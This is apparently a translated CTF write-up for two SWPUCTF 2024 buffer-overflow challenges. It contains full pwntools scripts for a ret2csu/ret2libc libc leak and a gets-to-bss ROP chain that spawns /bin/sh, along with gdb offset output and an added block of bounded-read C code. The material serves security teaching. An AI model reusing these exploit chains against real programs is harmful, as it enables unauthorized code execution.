出题人你到底干了什么? (Challenge author, what on earth did you do?)

[SWPUCTF 2024 Autumn Freshman Contest] 出题人你到底干了什么? (Challenge author, what on earth did you do?)

Preparation

64-bit, and only NX protection is enabled

Analysis

The main function

```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t n; // rax
  _BYTE buf[88]; // [rsp+0h] [rbp-60h] BYREF
  char *s; // [rsp+58h] [rbp-8h]

  s = ::s;
  n = strlen(::s);
  write(1, ::s, n);
  read(0, buf, 0x200uLL);
  return 0;
}
```

The program reads up to 512 (0x200) bytes of input into buf, but buf is only 88 bytes, so there is a stack buffer overflow.

Approach:

I thought about doing ret2libc through the write function, but I couldn't get that script working, so I first went with ret2csu, as the challenge tag suggests.
The key assembly section of the libc_csu_init function:

Get the offset with gdb

```
motaly@motaly-VMware-Virtual-Platform:~$ gdb loss
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 177 pwndbg commands and 46 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from loss...

This GDB supports auto-downloading debuginfo from the following URLs:
<https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in loss)
------- tip of the day (disable with set show-tips off) -------
Need to mmap or mprotect memory in the debugee? Use commands with the same name to inject and run such syscalls
pwndbg> cyclic 1000
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae
pwndbg> r
Starting program: /home/motaly/loss
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
听说你会ret2libc,让我康康!
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae

Program received signal SIGSEGV, Segmentation fault.
0x00000000004011c9 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────────────
RAX 0
RBX 0x7fffffffd848 ◂— 0x6261616161616179 ('yaaaaaab')
RCX 0x7ffff7d1ba61 (read+17) ◂— cmp rax, -0x1000 /* 'H=' */
RDX 0x200
RDI 0
RSI 0x7fffffffd6c0 ◂— 0x6161616161616161 ('aaaaaaaa')
R8 0x401240 (__libc_csu_fini) ◂— endbr64
R9 0x7ffff7fca380 (_dl_fini) ◂— endbr64
R10 0x7ffff7c109d8 ◂— 0x11001200001bd3
R11 0x246
R12 1
R13 0
R14 0
R15 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
RBP 0x616161616161616d ('maaaaaaa')
RSP 0x7fffffffd728 ◂— 0x616161616161616e ('naaaaaaa')
RIP 0x4011c9 (main+83) ◂— ret
─────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────
► 0x4011c9 <main+83> ret <0x616161616161616e>
───────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd728 ◂— 0x616161616161616e ('naaaaaaa')
01:0008│ 0x7fffffffd730 ◂— 0x616161616161616f ('oaaaaaaa')
02:0010│ 0x7fffffffd738 ◂— 0x6161616161616170 ('paaaaaaa')
03:0018│ 0x7fffffffd740 ◂— 0x6161616161616171 ('qaaaaaaa')
04:0020│ 0x7fffffffd748 ◂— 0x6161616161616172 ('raaaaaaa')
05:0028│ 0x7fffffffd750 ◂— 0x6161616161616173 ('saaaaaaa')
06:0030│ 0x7fffffffd758 ◂— 0x6161616161616174 ('taaaaaaa')
07:0038│ 0x7fffffffd760 ◂— 0x6161616161616175 ('uaaaaaaa')
─────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────
► 0 0x4011c9 main+83
1 0x616161616161616e None
2 0x616161616161616f None
3 0x6161616161616170 None
4 0x6161616161616171 None
5 0x6161616161616172 None
6 0x6161616161616173 None
7 0x6161616161616174 None
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> oaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae
Undefined command: "oaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae". Try "help".
pwndbg> cyclic -l 0x616161616161616e
Finding cyclic pattern of 8 bytes: b'naaaaaaa' (hex: 0x6e61616161616161)
Found at offset 104
```

The offset is 104.
Use ROPgadget to find the register gadgets:

Based on the ret2csu technique, write the corresponding csu payload

```python
from pwn import *
from LibcSearcher import *
context(arch='amd64',log_level='debug')
io=remote('node6.anna.nssctf.cn',21603)
# io=process('/home/motaly/loss')
elf=ELF('/home/motaly/loss')

write_got=elf.got['write']
csu1=0x401226   # first csu gadget: pops rbx, rbp, r12-r15
csu2=0x401210   # second csu gadget: loads the argument registers and calls
main=0x401176
rdi=0x401233

def csu(r12,r13,r14,r15,last):
    payload=b'a'*104           # offset to the saved return address
    payload+=p64(csu1)+p64(0)  # rbx = 0
    payload+=p64(0)+p64(1)     # padding, rbp = 1
    payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)
    payload+=p64(csu2)
    payload+=b'a'*56+p64(last) # skip the add rsp,8 and six pops, then return to `last`
    io.sendline(payload)
```

Then carry out a normal ret2libc (this challenge does not need stack alignment, so no ret gadget is required)

```python
def csu(r12,r13,r14,r15,last):
    payload=b'a'*104
    payload+=p64(csu1)+p64(0)
    payload+=p64(0)+p64(1)
    payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)
    payload+=p64(csu2)
    payload+=b'a'*56+p64(last)
    io.sendline(payload)

csu(1,write_got,8,write_got,main)   # write(1, write_got, 8), then back to main

io.recv()
write_addr = u64(io.recv(6).ljust(8, b'\x00'))
log.success('write :'+hex(write_addr))

libc=LibcSearcher("write", write_addr)
libc_base=write_addr-libc.dump('write')
log.success('libc_base: ' + hex(libc_base))
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump("str_bin_sh")

io.recvuntil(b"!\n")
payload=b'a'*104+p64(rdi)+p64(bin_sh)+p64(system)
io.sendline(payload)
```

Script

(libc: libc6_2.31-0ubuntu9.16_amd64) (works against the remote target; has problems locally)

```python
from pwn import *
from LibcSearcher import *
context(arch='amd64',log_level='debug')
io=remote('node6.anna.nssctf.cn',21603)
# io=process('/home/motaly/loss')
elf=ELF('/home/motaly/loss')

write_got=elf.got['write']
csu1=0x401226
csu2=0x401210
main=0x401176
rdi=0x401233

def csu(r12,r13,r14,r15,last):
    payload=b'a'*104
    payload+=p64(csu1)+p64(0)
    payload+=p64(0)+p64(1)
    payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)
    payload+=p64(csu2)
    payload+=b'a'*56+p64(last)
    io.sendline(payload)

csu(1,write_got,8,write_got,main)

io.recv()
write_addr = u64(io.recv(6).ljust(8, b'\x00'))
log.success('write :'+hex(write_addr))

libc=LibcSearcher("write", write_addr)
libc_base=write_addr-libc.dump('write')
log.success('libc_base: ' + hex(libc_base))
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump("str_bin_sh")

io.recvuntil(b"!\n")
payload=b'a'*104+p64(rdi)+p64(bin_sh)+p64(system)
io.sendline(payload)

io.interactive()
```

ret2libc也阴嘛? (Is ret2libc also a trap?)

[SWPUCTF 2024 Autumn Freshman Contest] ret2libc也阴嘛? (Is ret2libc also a trap?)

Preparation

64-bit, NX protection enabled

Analysis

The main function

```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  _BYTE v4[48]; // [rsp+0h] [rbp-30h] BYREF

  init(argc, argv, envp);
  gets(v4);
  return 0;
}
```

gets is used, so there is a stack buffer overflow.

The backdoor function
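As an added example (not from the original writeup or the challenge binaries), the bounded counterparts of the two unsafe reads seen above: read(0, buf, 0x200) into the 88-byte buf of the first challenge, and gets(v4) into the 48-byte v4 here. The two self-check helpers feed constructed oversized input (in place of the cyclic pattern used in the gdb sessions) and return how many bytes the hardened readers actually store.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 88   /* size of the stack buffer in the decompiled main() */

/* Hardened replacement for read(0, buf, 0x200): the length comes from the
 * buffer itself, one byte is reserved for a terminator, and the result is
 * NUL-terminated. Excess input simply stays unread in the descriptor. */
ssize_t read_bounded(int fd, char *buf, size_t buf_size) {
    if (buf == NULL || buf_size == 0) return -1;
    ssize_t n = read(fd, buf, buf_size - 1);
    buf[n < 0 ? 0 : n] = '\0';
    return n;
}

/* Replacement for gets(v4) on the second challenge's 48-byte buffer: fgets()
 * takes the buffer size, so a long line is truncated instead of running over
 * the saved rbp and return address. Returns stored length, -1 on EOF/error. */
long line_bounded(char *buf, size_t buf_size, FILE *in) {
    if (fgets(buf, (int)buf_size, in) == NULL) return -1;
    buf[strcspn(buf, "\n")] = '\0';       /* drop the newline, as gets() would */
    return (long)strlen(buf);
}

/* Self-check: push `len` bytes of 'a' through a pipe (constructed input, in
 * place of the 1000-byte cyclic pattern from the gdb session) and report how
 * many bytes the bounded reader stored in an 88-byte buffer. */
long bounded_read_accepts(size_t len) {
    int fds[2]; char buf[BUF_SIZE];
    char *input = malloc(len + 1);
    if (input == NULL || pipe(fds) != 0) { free(input); return -1; }
    memset(input, 'a', len);
    ssize_t w = write(fds[1], input, len);  /* 1000 bytes fit in a pipe buffer */
    close(fds[1]);
    ssize_t n = (w == (ssize_t)len) ? read_bounded(fds[0], buf, sizeof buf) : -1;
    close(fds[0]);
    free(input);
    return (n >= 0 && buf[n] == '\0') ? (long)n : -1;
}

/* Same check for the gets() replacement: `len` 'a's plus a newline, served
 * from a temporary file, into a 48-byte buffer. */
long bounded_line_accepts(size_t len) {
    char buf[48];
    FILE *in = tmpfile();
    if (in == NULL) return -1;
    for (size_t i = 0; i < len; i++) fputc('a', in);
    fputc('\n', in);
    rewind(in);
    long n = line_bounded(buf, sizeof buf, in);
    fclose(in);
    return n;
}
```

With 1000 bytes of input the bounded readers store 87 and 47 bytes respectively, so nothing reaches the saved return address that the 104- and 56-byte offsets above point at.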

```c
__int64 __fastcall backdoor(const char *command)
{
  system(command);
  return 0LL;
}
```

It calls system.

Approach:

This challenge has a stack overflow and a backdoor function that runs its argument through system, so the goal is to get /bin/sh into that function's argument and obtain a shell. There is no other useful information, so the argument has to be constructed:
use gets to write /bin/sh to an address in the bss segment, then set that bss address as the argument to backdoor.
First get the offset with gdb

```
motaly@motaly-VMware-Virtual-Platform:~$ gdb no
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 177 pwndbg commands and 46 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from no...

This GDB supports auto-downloading debuginfo from the following URLs:
<https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in no)
------- tip of the day (disable with set show-tips off) -------
Use the context (or ctx) command to display the context once again. You can reconfigure the context layout with set context-section <sections> or forward the output to a file/tty via set context-output <file>. See also config context to configure it further!
pwndbg> cyclic 500
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa
pwndbg> r
Starting program: /home/motaly/no
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa

Program received signal SIGSEGV, Segmentation fault.
0x000000000040120d in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────────────────────────────────────────
RAX 0
RBX 0x7fffffffd848 ◂— 'saaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa'
RCX 0x7ffff7e038e0 (_IO_2_1_stdin_) ◂— 0xfbad208b
RDX 0
RDI 0x7ffff7e05720 (_IO_stdfile_0_lock) ◂— 0
RSI 0x7ffff7e03963 (_IO_2_1_stdin_+131) ◂— 0xe05720000000000a /* '\n' */
R8 0
R9 0
R10 0x7ffff7c0e008 ◂— 0x110022000047e8
R11 0x246
R12 1
R13 0
R14 0
R15 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
RBP 0x6161616161616167 ('gaaaaaaa')
RSP 0x7fffffffd728 ◂— 0x6161616161616168 ('haaaaaaa')
RIP 0x40120d (main+45) ◂— ret
─────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────────────────────────────────────────
► 0x40120d <main+45> ret <0x6161616161616168>
──────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd728 ◂— 0x6161616161616168 ('haaaaaaa')
01:0008│ 0x7fffffffd730 ◂— 0x6161616161616169 ('iaaaaaaa')
02:0010│ 0x7fffffffd738 ◂— 0x616161616161616a ('jaaaaaaa')
03:0018│ 0x7fffffffd740 ◂— 0x616161616161616b ('kaaaaaaa')
04:0020│ 0x7fffffffd748 ◂— 0x616161616161616c ('laaaaaaa')
05:0028│ 0x7fffffffd750 ◂— 0x616161616161616d ('maaaaaaa')
06:0030│ 0x7fffffffd758 ◂— 0x616161616161616e ('naaaaaaa')
07:0038│ 0x7fffffffd760 ◂— 0x616161616161616f ('oaaaaaaa')
────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────────────────
► 0 0x40120d main+45
1 0x6161616161616168 None
2 0x6161616161616169 None
3 0x616161616161616a None
4 0x616161616161616b None
5 0x616161616161616c None
6 0x616161616161616d None
7 0x616161616161616e None
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l 0x6161616161616168
Finding cyclic pattern of 8 bytes: b'haaaaaaa' (hex: 0x6861616161616161)
Found at offset 56
```

The offset is 56.
Then look up the backdoor function address and the bss address in IDA:

The backdoor function's address is 0x4011BD.

Since this is a 64-bit program, stack alignment has to be considered, and gets takes one argument, which goes in the rdi register; the relevant gadgets were found with ROPgadget:

With this information, build the payload directly

```python
bss=0x404040+0x100
backdoor = 0x4011bd
gets_plt = elf.plt["gets"]
rdi=0x401273
ret = 0x40101a

payload=b'a'*56+p64(ret)+p64(ret)+p64(rdi)+p64(bss)+p64(gets_plt)+p64(rdi)+p64(bss)+p64(backdoor)
io.sendline(payload)

io.sendline(b"/bin/sh\x00")
```

The bss address is bumped up a little here so that the input does not land at the very start of bss and clobber sensitive data or data structures
(more bluntly: using the start address didn't work).
The chain first sets the argument register to the bss address for gets, then sets the same register to the bss address for backdoor.
The /bin/sh\x00 we send at the end is what gets(bss) writes there, and since backdoor(bss) follows, we get a shell.
The key point here is the two ret paddings: normally a 64-bit program needs one ret for stack alignment, and that is how I wrote it at first, but it didn't work; debugging showed the program getting stuck here

with this error, which is related to the stack alignment problem.
So adding one more ret value here made it work.

Script

```python
from pwn import *
context(os='linux',log_level = 'debug',arch='amd64')
# io = remote('node6.anna.nssctf.cn',22138)
io= process('/home/motaly/no')
elf=ELF('/home/motaly/no')

bss=0x404040+0x100
backdoor = 0x4011bd
gets_plt = elf.plt["gets"]
rdi=0x401273
ret = 0x40101a

payload=b'a'*56+p64(ret)+p64(ret)+p64(rdi)+p64(bss)+p64(gets_plt)+p64(rdi)+p64(bss)+p64(backdoor)
io.sendline(payload)

io.sendline(b"/bin/sh\x00")

io.interactive()
```